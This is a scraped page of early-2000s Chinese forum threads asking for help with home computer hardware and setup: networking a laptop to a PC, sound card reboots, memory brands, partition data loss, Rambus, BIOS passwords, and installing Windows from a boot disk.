手提计算机和PC怎么样互联？急！

上一贴 | 下一贴
发表人 主题: 手提计算机和PC怎么样互联？急！
scripboy

高级用户
积分：195
发帖：63
来自：南京
注册：2000-12-28
 发表于 2001-11-17 12:23:17 按此观看scripboy的个人资料 按此发邮件给scripboy 访问scripboy的主页 收藏该主题供以后查看 发送悄悄话给scripboy 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看scripboy的IP
谢谢，很急！

:::从容面对:::
cinkey

我和我追逐的梦
积分：1132
发帖：2183
来自：杭州
注册：2001-06-21
 发表于 2001-11-17 12:56:43 按此观看cinkey的个人资料 按此发邮件给cinkey 访问cinkey的主页 cinkey 的 oicq 是23516844,查看 23516844 的资料 发送悄悄话给cinkey 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看cinkey的IP
有好几种方法
最简单的方法就是用打印线连接，但是速度较慢
或者用USB接口也可以，速度挺不错
如果你的笔记本有网卡的话那就更好了

 悠長假期   |  反恐联盟  |  CS服务器状态查看  |  CS反作弊客户端
Quester

鼠标说话
是个版主
积分：2604
发帖：1175
来自：GTA
注册：2000-08-28
 发表于 2001-11-17 16:14:38 按此观看Quester的个人资料 按此发邮件给Quester 发送悄悄话给Quester 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看Quester的IP
红外线网络比较方便，价格贵一点。

下载 ColorKey 试用版 解决配色问题
逢对手鼠标说话，仗一键快意恩仇！
...乍暖還寒時候，最難將息...
Blueidea Web Team
Moderator of Art & Design
13RD

无畏的 13 郎
积分：2207
发帖：2967
来自：广州
注册：2000-06-17
 发表于 2001-11-17 22:11:20 按此观看13RD的个人资料 按此发邮件给13RD 访问13RD的主页 13RD 的 oicq 是1428147,查看 1428147 的资料 发送悄悄话给13RD 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看13RD的IP
用网卡互联的方法最好，因为这样的方法最普遍，网上的教程也很多～
到google.com一查肯定很多资料的～

我要唱这阙痛快的歌
我要说每句叛逆对白
倾听我呐喊 别当做轻松笑话
我要唱这阙发泄的歌
我要与世界热烈对话
倾听我呐喊
magiclord

初级用户
积分：68
发帖：21
来自：济南，山东，中国
注册：2000-10-17
 发表于 2001-11-18 07:15:38 按此观看magiclord的个人资料 按此发邮件给magiclord magiclord 的 oicq 是1436455,查看 1436455 的资料 发送悄悄话给magiclord 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看magiclord的IP
如果有网卡的确比较方便，只需一根级连线就可以！
上一贴 | 下一贴
快速回复 | 主题：手提计算机和PC怎么样互联？急！
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


我的 SB! LIVE ......

计算机技术
我的 SB! LIVE ......

上一贴 | 下一贴
发表人 | 主题: 我的 SB! LIVE ......
Starfox 高级用户 积分：211 发帖：59 来自：北京 注册：2001-10-08 | 发表于 2001-11-11 17:54:56 按此观看Starfox的个人资料 按此发邮件给Starfox 访问Starfox的主页 Starfox 的 oicq 是11266330,查看 11266330 的资料 收藏该主题供以后查看 发送悄悄话给Starfox 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看Starfox的IP 我的SB! Live Value 在win2k下被认成Basic ，面且不能安装Live! Ware ，安装后win2k在起动时自己重启，而且把声卡驱动改为Value后，同样重启~~~~ 请各位大侠指点~~~ 配置如下: P4 1.5 (Socket 423) ASUS P4T-F ATI Radeon LE Ultra SB! Live Value ISDN Maxtor 60G Windows 2000 Professioal
ADSL 终级用户 积分：2969 发帖：668 来自：贫困山区 注册：2001-03-06 | 发表于 2001-11-11 19:39:21 按此观看ADSL的个人资料 该用户不允许显示它的电子邮件 发送悄悄话给ADSL 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看ADSL的IP 把卡换个槽试试 好好学习，努力做事
Starfox 高级用户 积分：211 发帖：59 来自：北京 注册：2001-10-08 | 发表于 2001-11-12 23:58:43 按此观看Starfox的个人资料 按此发邮件给Starfox 访问Starfox的主页 Starfox 的 oicq 是11266330,查看 11266330 的资料 发送悄悄话给Starfox 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看Starfox的IP 我已经试过了~~~~
Danger |危险| 积分：4264 发帖：4253 来自：}Earth{ 注册：2001-06-15 | 发表于 2001-11-13 01:11:21 按此观看Danger的个人资料 按此发邮件给Danger 访问Danger的主页 Danger 的 oicq 是4297246,查看 4297246 的资料 发送悄悄话给Danger 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看Danger的IP 上驱动之家下载最新版的驱动程序！ Dangerous... Blueidea Web Team Moderator Of Flash forum
Starfox 高级用户 积分：211 发帖：59 来自：北京 注册：2001-10-08 | 发表于 2001-11-13 22:16:05 按此观看Starfox的个人资料 按此发邮件给Starfox 访问Starfox的主页 Starfox 的 oicq 是11266330,查看 11266330 的资料 发送悄悄话给Starfox 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看Starfox的IP 我就是用的最新的驱动~
张无忌 win1st 管理员 积分：7148 发帖：3108 来自：Blueidea.com 注册：2000-09-10 | 发表于 2001-11-13 22:37:31 按此观看张无忌的个人资料 按此发邮件给张无忌 访问张无忌的主页 发送悄悄话给张无忌 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看张无忌的IP 很可能是因为主板的芯片组太新，和操作系统之间有问题。 先去升级win2k的sp2以上补丁，再去intel找最新的芯片组驱动，再去找最新的声卡驱动！ 只用一样东西，不明白它的道理，实在不高明 Blueidea Web Team Team Member
Starfox 高级用户 积分：211 发帖：59 来自：北京 注册：2001-10-08 | 发表于 2001-11-14 21:12:34 按此观看Starfox的个人资料 按此发邮件给Starfox 访问Starfox的主页 Starfox 的 oicq 是11266330,查看 11266330 的资料 发送悄悄话给Starfox 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看Starfox的IP 哦。
randomix 小 乱 积分：4642 发帖：1647 来自：亂度謎城 注册：2000-11-30 | 发表于 2001-11-15 18:09:25 按此观看randomix的个人资料 按此发邮件给randomix 访问randomix的主页 randomix 的 oicq 是3016887,查看 3016887 的资料 发送悄悄话给randomix 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看randomix的IP sb live跟P3 cpu有冲突，有个补丁，不知道跟P4有没有问题？ 我也是用SB LIVE，现在用XP啦，以前用2000也没事的。 LIVE WARE有forXP的，呵呵！ [这消息被randomix编辑过(编辑时间2001-11-15 18:09:30)] always ran...
上一贴 | 下一贴
快速回复 | 主题：我的 SB! LIVE ......
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


我想换内存，有好的牌子吗？

计算机技术
我想换内存，有好的牌子吗？

上一贴 | 下一贴
发表人 主题: 我想换内存，有好的牌子吗？
moonbaby526

初级用户
积分：94
发帖：93
来自：上海
注册：2001-06-24
 发表于 2001-11-09 14:21:26 按此观看moonbaby526的个人资料 按此发邮件给moonbaby526 访问moonbaby526的主页 moonbaby526 的 oicq 是14023400,查看 14023400 的资料 收藏该主题供以后查看 发送悄悄话给moonbaby526 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看moonbaby526的IP
如题。

可以不在乎，才能对别人在乎。
MOP

拖把一族
积分：1263
发帖：854
来自：垃圾箱
注册：2001-09-28
 发表于 2001-11-09 14:55:02 按此观看MOP的个人资料 按此发邮件给MOP MOP 的 oicq 是125535345,查看 125535345 的资料 发送悄悄话给MOP 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看MOP的IP
Kingmax 怎么样,我现在用的是也是kingmax不错的~

---------------------------------------------
+ MOP FAMILY +
=Blueidea=MOP
软硬兼施

终级用户
积分：465
发帖：295
来自：net
注册：2001-08-03
 发表于 2001-11-09 15:14:34 按此观看软硬兼施的个人资料 按此发邮件给软硬兼施 软硬兼施 的 oicq 是18245854,查看 18245854 的资料 发送悄悄话给软硬兼施 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看软硬兼施的IP
MOP在上个帖子中说
引用:
Kingmax 怎么样,我现在用的是也是kingmax不错的~

认同!

^^
moonbaby526

初级用户
积分：94
发帖：93
来自：上海
注册：2001-06-24
 发表于 2001-11-09 15:45:08 按此观看moonbaby526的个人资料 按此发邮件给moonbaby526 访问moonbaby526的主页 moonbaby526 的 oicq 是14023400,查看 14023400 的资料 发送悄悄话给moonbaby526 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看moonbaby526的IP
256M的有吗？多少钱？

可以不在乎，才能对别人在乎。
MOP

拖把一族
积分：1263
发帖：854
来自：垃圾箱
注册：2001-09-28
 发表于 2001-11-09 16:39:25 按此观看MOP的个人资料 按此发邮件给MOP MOP 的 oicq 是125535345,查看 125535345 的资料 发送悄悄话给MOP 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看MOP的IP
当然有了~
我的就是两个 256MB
我买时花了280元.不知道现在多钱了~

---------------------------------------------
+ MOP FAMILY +
=Blueidea=MOP
Aero-lk

病态天使
现任版主
积分：8862
发帖：4335
来自：appEndiXDesi
注册：2001-03-14
 发表于 2001-11-10 09:05:57 按此观看Aero-lk的个人资料 按此发邮件给Aero-lk 访问Aero-lk的主页 Aero-lk 的 oicq 是15028519,查看 15028519 的资料 发送悄悄话给Aero-lk 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看Aero-lk的IP
更便宜

F-baby,i love u,forever
软硬兼施

终级用户
积分：465
发帖：295
来自：net
注册：2001-08-03
 发表于 2001-11-10 09:08:38 按此观看软硬兼施的个人资料 按此发邮件给软硬兼施 软硬兼施 的 oicq 是18245854,查看 18245854 的资料 发送悄悄话给软硬兼施 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看软硬兼施的IP
MOP在上个帖子中说
引用:
当然有了~
我的就是两个 256MB
我买时花了280元.不知道现在多钱了~

你的机器是什么配置

^^
moonbaby526

初级用户
积分：94
发帖：93
来自：上海
注册：2001-06-24
 发表于 2001-11-10 09:29:33 按此观看moonbaby526的个人资料 按此发邮件给moonbaby526 访问moonbaby526的主页 moonbaby526 的 oicq 是14023400,查看 14023400 的资料 发送悄悄话给moonbaby526 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看moonbaby526的IP
是问我吗？
主板：奔驰160M＋声卡
CPU：赛扬II566（落伍了）
硬盘：昆腾20G（太小）
光驱：华硕40X
彩显：三星17’
软驱：NEC1.44兆
显卡：小影霸TNT2 16M
MODEM：同微 NCF 56k
内存：KINGMAX 133 64兆
音箱：DIBA
一年前配的，请大家给点意见。

可以不在乎，才能对别人在乎。
yunbin

经典强盗
现任版主
积分：2292
发帖：1001
来自：火星
注册：2001-09-27
 发表于 2001-11-10 10:56:54 按此观看yunbin的个人资料 按此发邮件给yunbin 访问yunbin的主页 yunbin 的 oicq 是2369009,查看 2369009 的资料 发送悄悄话给yunbin 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yunbin的IP
kingstron 的条子也不错的 价格和kingmax 相近 不过感觉比他好!~

A man can succeed at almost anything
for which he has unlimited enthusiasm.

Blueidea Web Team
Moderator Of Computer Technology Forum

Aero-lk

病态天使
现任版主
积分：8862
发帖：4335
来自：appEndiXDesi
注册：2001-03-14
 发表于 2001-11-10 12:13:03 按此观看Aero-lk的个人资料 按此发邮件给Aero-lk 访问Aero-lk的主页 Aero-lk 的 oicq 是15028519,查看 15028519 的资料 发送悄悄话给Aero-lk 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看Aero-lk的IP
现代的吧 便宜啊

F-baby,i love u,forever
上一贴 | 下一贴
快速回复 | 主题：我想换内存，有好的牌子吗？
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


关机变重启？

计算机技术
关机变重启？

上一贴 | 下一贴
发表人 | 主题: 关机变重启？
小混蛋 初级用户 积分：12 发帖：12 来自：蛋蛋王国 注册：2001-03-27 | 发表于 2001-11-11 22:36:21 按此观看小混蛋的个人资料 按此发邮件给小混蛋 小混蛋 的 oicq 是2353523,查看 2353523 的资料 收藏该主题供以后查看 发送悄悄话给小混蛋 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看小混蛋的IP 98，2k下都是这样，只能按机箱上的power键才能关机。 我是个坏小孩。
MOP 拖把一族 积分：1263 发帖：854 来自：垃圾箱 注册：2001-09-28 | 发表于 2001-11-12 02:25:41 按此观看MOP的个人资料 按此发邮件给MOP MOP 的 oicq 是125535345,查看 125535345 的资料 发送悄悄话给MOP 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看MOP的IP 是不是马虎,关机时选择了重新启动计算机呀? --------------------------------------------- + MOP FAMILY + =Blueidea=MOP
darkvn 小混蛋 现任版主 积分：8225 发帖：2542 来自：不是外星 注册：2001-03-02 | 发表于 2001-11-15 17:31:10 按此观看darkvn的个人资料 按此发邮件给darkvn 访问darkvn的主页 darkvn 的 oicq 是2353523,查看 2353523 的资料 发送悄悄话给darkvn 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看darkvn的IP 问题已经解决， 原来是usb在作怪。我usb上接了线，但另一头没有连接设备。 在bios的电源管理设置里把usb唤醒关闭就可以了。 Blueidea Web Team Moderator Of Dreamweaver & Javascript
上一贴 | 下一贴
快速回复 | 主题：关机变重启？
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


请快帮帮我吧！

计算机技术
请快帮帮我吧！

上一贴 | 下一贴
发表人 主题: 请快帮帮我吧！
cymkathy

初级用户
积分：0
发帖：1
来自：
注册：2001-11-08
 发表于 2001-11-09 07:39:31 按此观看cymkathy的个人资料 按此发邮件给cymkathy 收藏该主题供以后查看 发送悄悄话给cymkathy 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看cymkathy的IP
我20G的硬盘以前分区不合理，在用PQ Magic重新分配硬盘空间时，突然停电，导致E盘里的数据全部坏掉（其它盘里的数据都能用），而E盘里有我们单位的重要数据。
1.来电后打看电源可以顺利的进入windows，除E盘外，其它盘里的东西都很正常。打开E盘一看，my god,文件夹不是乱吗就是缺胳膊少腿，乱的一塌糊涂！这是我有所预料的，因为停电时PQ正在DOS下处理E盘的数据。
2.打开PQ，上边的盘符显示框里多出了一段灰色的unallocated，有831.5MB，其info为：
partion type: unallocated
serial number: none
first physicao sector : 34,363,035(cyl 2,139,hd0,sect1)
last physicao sector: 36,065,924(cyl2,244,hd254,sect63)
total physical sector:1,702,890(831.5MB)
想必这块就是当时没来得及交换的E盘的数据。那么我想可不可以使PQ按照停电前的设置重新工作一下，完成它未尽的事业，结果在DOS窗口下，显示如下的错误信息：
Error 634 Reading batch list from file C:\WINDOWS\SYSTEM\PQ_BATCH.PQB
Error 634 While executing Batch
有没有办法使E盘的数据恢复？快点帮帮我，我现在都要疯掉了！
晓东

高级用户
积分：176
发帖：183
来自：理想空间
注册：2001-09-28
 发表于 2001-11-09 08:12:26 按此观看晓东的个人资料 按此发邮件给晓东 访问晓东的主页 晓东 的 oicq 是1263524,查看 1263524 的资料 发送悄悄话给晓东 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看晓东的IP
估计是够呛了，如果一定要回复，找专业的数据安全公司吧。代价很高的。绝对让你吐血......

理想论坛　www.15m.com/winbbs
君不见
黄河之水天上来，忽如一夜春风来
铁马冰河入梦来，千金散尽还复来......
DayinNightout

超级用户
积分：338
发帖：150
来自：CCF
注册：2000-12-18
 发表于 2001-11-09 10:57:55 按此观看DayinNightout的个人资料 按此发邮件给DayinNightout 发送悄悄话给DayinNightout 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看DayinNightout的IP
基本上没戏了，楼上兄弟说的对只有找他们了

btw:用PQ是很危险的事，望大家警惕

木有签名#@$%
软硬兼施

终级用户
积分：465
发帖：295
来自：net
注册：2001-08-03
 发表于 2001-11-09 15:06:01 按此观看软硬兼施的个人资料 按此发邮件给软硬兼施 软硬兼施 的 oicq 是18245854,查看 18245854 的资料 发送悄悄话给软硬兼施 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看软硬兼施的IP
cymkathy在上个帖子中说
引用:
我20G的硬盘以前分区不合理，在用PQ Magic重新分配硬盘空间时，突然停电，导致E盘里的数据全部坏掉（其它盘里的数据都能用），而E盘里有我们单位的重要数据。
1.来电后打看电源可以顺利的进入windows，除E盘外，其它盘里的东西都很正常。打开E盘一看，my god,文件夹不是乱吗就是缺胳膊少腿，乱的一塌糊涂！这是我有所预料的，因为停电时PQ正在DOS下处理E盘的数据。
2.打开PQ，上边的盘符显示框里多出了一段灰色的unallocated，有831.5MB，其info为：
partion type: unallocated
serial number: none
first physicao sector : 34,363,035(cyl 2,139,hd0,sect1)
last physicao sector: 36,065,924(cyl2,244,hd254,sect63)
total physical sector:1,702,890(831.5MB)
想必这块就是当时没来得及交换的E盘的数据。那么我想可不可以使PQ按照停电前的设置重新工作一下，完成它未尽的事业，结果在DOS窗口下，显示如下的错误信息：
Error 634 Reading batch list from file C:\WINDOWS\SYSTEM\PQ_BATCH.PQB
Error 634 While executing Batch
有没有办法使E盘的数据恢复？快点帮帮我，我现在都要疯掉了！

可以用KV呀,还有瑞星,金山什么的都能恢复数据的!

^^
晓东

高级用户
积分：176
发帖：183
来自：理想空间
注册：2001-09-28
 发表于 2001-11-09 15:26:24 按此观看晓东的个人资料 按此发邮件给晓东 访问晓东的主页 晓东 的 oicq 是1263524,查看 1263524 的资料 发送悄悄话给晓东 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看晓东的IP
软硬兼施在上个帖子中说
引用:
cymkathy在上个帖子中说
引用:
我20G的硬盘以前分区不合理，在用PQ Magic重新分配硬盘空间时，突然停电，导致E盘里的数据全部坏掉（其它盘里的数据都能用），而E盘里有我们单位的重要数据。
1.来电后打看电源可以顺利的进入windows，除E盘外，其它盘里的东西都很正常。打开E盘一看，my god,文件夹不是乱吗就是缺胳膊少腿，乱的一塌糊涂！这是我有所预料的，因为停电时PQ正在DOS下处理E盘的数据。
2.打开PQ，上边的盘符显示框里多出了一段灰色的unallocated，有831.5MB，其info为：
partion type: unallocated
serial number: none
first physicao sector : 34,363,035(cyl 2,139,hd0,sect1)
last physicao sector: 36,065,924(cyl2,244,hd254,sect63)
total physical sector:1,702,890(831.5MB)
想必这块就是当时没来得及交换的E盘的数据。那么我想可不可以使PQ按照停电前的设置重新工作一下，完成它未尽的事业，结果在DOS窗口下，显示如下的错误信息：
Error 634 Reading batch list from file C:\WINDOWS\SYSTEM\PQ_BATCH.PQB
Error 634 While executing Batch
有没有办法使E盘的数据恢复？快点帮帮我，我现在都要疯掉了！

可以用KV呀,还有瑞星,金山什么的都能恢复数据的!

原理不同，没用的

理想论坛　www.15m.com/winbbs
君不见
黄河之水天上来，忽如一夜春风来
铁马冰河入梦来，千金散尽还复来......
hellslayer

初级用户
积分：20
发帖：251
来自：不能上网的学校
注册：2001-04-04
 发表于 2001-11-09 16:59:06 按此观看hellslayer的个人资料 按此发邮件给hellslayer hellslayer 的 oicq 是4369873,查看 4369873 的资料 发送悄悄话给hellslayer 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看hellslayer的IP
对于这个，我只能说是抱歉了，只能找专业的公司了，恢复数据需要专门的工具。不是什么软件能解决的了，给你大概报个价格，北京是3000元，恢复数据。你去问问能不能恢复吧。

"我亦终将屈服于死亡，但在那之前，让我赢得荣耀吧"
上一贴 | 下一贴
快速回复 | 主题：请快帮帮我吧！
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


rambus还有前途吗？

计算机技术
rambus还有前途吗？

上一贴 | 下一贴
发表人 | 主题: rambus还有前途吗？
randomix 小 乱 积分：4642 发帖：1647 来自：亂度謎城 注册：2000-11-30 | 发表于 2001-11-09 09:38:26 按此观看randomix的个人资料 按此发邮件给randomix 访问randomix的主页 randomix 的 oicq 是3016887,查看 3016887 的资料 收藏该主题供以后查看 发送悄悄话给randomix 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看randomix的IP 装rambus ram的P4比同样配置，装SD RAM的p4相比，会快很多吗？ rambus现在其实也不是很贵。。。虽然跟sdram比很贵，但是128M的330，256m 750多，以前我买128M的SD RAM要1200多阿。所以我觉得如果P4+RAMBUS其实也不是很贵。。。。。 总觉得P4+SDRAM。。。怪怪的。 always ran...
fly Developer 积分：3998 发帖：995 来自： 注册：2001-10-31 | 发表于 2001-11-09 09:52:38 按此观看fly的个人资料 按此发邮件给fly fly 的 oicq 是7969660,查看 7969660 的资料 发送悄悄话给fly 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看fly的IP 带宽很大，我喜欢，推荐使用！ 我的虚荣心是用十句话说出别人用一本书讲出的东西和别人用一本书没有讲出的东西. ----尼采
DayinNightout 超级用户 积分：338 发帖：150 来自：CCF 注册：2000-12-18 | 发表于 2001-11-09 10:54:39 按此观看DayinNightout的个人资料 按此发邮件给DayinNightout 发送悄悄话给DayinNightout 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看DayinNightout的IP 如果价格下来的话，力马就是RAMBUS的天下了 木有签名#@$%
DW5 阻击之眼 积分：2678 发帖：2517 来自：blueidea 注册：2001-07-29 | 发表于 2001-11-09 11:00:51 按此观看DW5的个人资料 按此发邮件给DW5 DW5 的 oicq 是48580488,查看 48580488 的资料 发送悄悄话给DW5 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看DW5的IP 可是现在Athlon XP 1.53G＋256DDR＋KT266A比P45.0G＋256RD＋i850快好多，除非P4把性能提高上去，否则RD迟早被淘汰，就算价格降低也是枉然，因为P4的价格下不来 永远走在时代的最前端。。。 Blueidea Cs Team Team Nicker -]Blueidea[- Y.DW5
maobi 初级用户 积分：117 发帖：30 来自：浙江江山 注册：2000-12-04 | 发表于 2002-04-19 16:51:27 按此观看maobi的个人资料 按此发邮件给maobi 发送悄悄话给maobi 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看maobi的IP 我用rambus，因为单位出钱。有钱当然用rambus了。不求最好，但求最贵！！ :::::我静静的看着这个世界:::::
onlysnake 终级用户 积分：1971 发帖：696 来自：经典_流氓屯 注册：2002-01-10 | 发表于 2002-04-19 23:20:34 按此观看onlysnake的个人资料 按此发邮件给onlysnake onlysnake 的 oicq 是24394523,查看 24394523 的资料 发送悄悄话给onlysnake 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看onlysnake的IP 我可以毫无疑问的告诉你， RAMBUS就是“垃圾” 信不信由你， 毫无发展前途， 至少现在是这样的！！！ 我在天空写下你的名字，但是被风带走了；我在沙滩写下你的名字，但是被浪花带走了；于是，我在大街上的每个角落写下你的名字，…………·#！￥%—*+但是，我被警察带走了！！ Blueidea Counter Strike Team =Blueidea=onlysnake
zhangcs 老张 积分：1251 发帖：347 来自： 注册：2001-07-15 | 发表于 2002-04-20 00:19:06 按此观看zhangcs的个人资料 按此发邮件给zhangcs 访问zhangcs的主页 发送悄悄话给zhangcs 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看zhangcs的IP 那东西用“扶不起的阿斗”来形容再贴切不过了，我可救药。 魔鬼创造了电脑，那些做软件的显然是它的帮凶，沉迷于电脑的人啊，你的下场...... ◆欢迎光临ZCS-3D园地◆ 原创教程资料站
上一贴 | 下一贴
快速回复 | 主题：rambus还有前途吗？
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


请问一下。

计算机技术
请问一下。

上一贴 | 下一贴
发表人 | 主题: 请问一下。
nicely 初级用户 积分：40 发帖：19 来自： 注册：2001-07-29 | 发表于 2001-11-08 12:11:39 按此观看nicely的个人资料 按此发邮件给nicely nicely 的 oicq 是7955851,查看 7955851 的资料 收藏该主题供以后查看 发送悄悄话给nicely 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看nicely的IP 如果设置电脑的开机密码。在BIOS中。谢。 by nicely
raulzhen 初级用户 积分：61 发帖：23 来自： 注册：2001-08-29 | 发表于 2001-11-08 20:55:16 按此观看raulzhen的个人资料 按此发邮件给raulzhen 发送悄悄话给raulzhen 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看raulzhen的IP 在BISO中有USEPASSWORD的选项的。应该有两个选项的。高一级的是进入BISO和进入系统，底一级的是进入系统！
晓东 高级用户 积分：176 发帖：183 来自：理想空间 注册：2001-09-28 | 发表于 2001-11-08 23:01:55 按此观看晓东的个人资料 按此发邮件给晓东 访问晓东的主页 晓东 的 oicq 是1263524,查看 1263524 的资料 发送悄悄话给晓东 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看晓东的IP superpassword控制bios密码 userpassword控制系统进入 理想论坛 www.15m.com/winbbs 君不见 黄河之水天上来，忽如一夜春风来 铁马冰河入梦来，千金散尽还复来......
nicely 初级用户 积分：40 发帖：19 来自： 注册：2001-07-29 | 发表于 2001-11-09 02:23:42 按此观看nicely的个人资料 按此发邮件给nicely nicely 的 oicq 是7955851,查看 7955851 的资料 发送悄悄话给nicely 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看nicely的IP 谢。如果在USRPASSWORD中设置进入系统的密码，还需在哪修改设置以其可以得到该效果吗？ by nicely
晓东 高级用户 积分：176 发帖：183 来自：理想空间 注册：2001-09-28 | 发表于 2001-11-09 08:09:30 按此观看晓东的个人资料 按此发邮件给晓东 访问晓东的主页 晓东 的 oicq 是1263524,查看 1263524 的资料 发送悄悄话给晓东 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看晓东的IP 这时候已经不用进行任何设置了，进入系统必须输入密码，直至重新在userpassword中不输入任何数值回车。 理想论坛 www.15m.com/winbbs 君不见 黄河之水天上来，忽如一夜春风来 铁马冰河入梦来，千金散尽还复来......
上一贴 | 下一贴
快速回复 | 主题：请问一下。
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


如何用98启动盘安装2000和XP！（不会请进）

计算机技术
如何用98启动盘安装2000和XP！（不会请进）

上一贴 | 下一贴
发表人 主题: 如何用98启动盘安装2000和XP！（不会请进）
BIGBUG

终级用户
积分：1095
发帖：720
来自：不一定
注册：2001-03-21
 发表于 2001-11-15 13:28:35 按此观看BIGBUG的个人资料 按此发邮件给BIGBUG BIGBUG 的 oicq 是9718783,查看 9718783 的资料 收藏该主题供以后查看 发送悄悄话给BIGBUG 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看BIGBUG的IP
首先建议不论安装什么系统，可能的情况下均选用全新安装

用98启动盘装，为了提高安装速度，强烈建议安装前运行“Smartdrv。exe”先（注意：制作98盘时SmartDrv文件一般没有，可以到98光盘或已安装的98系统中copy一个到启动盘）
过程：
1、放入2000（XP）光碟，插入98启动盘，设置为A：盘启动
2、选择带光驱进入DOS
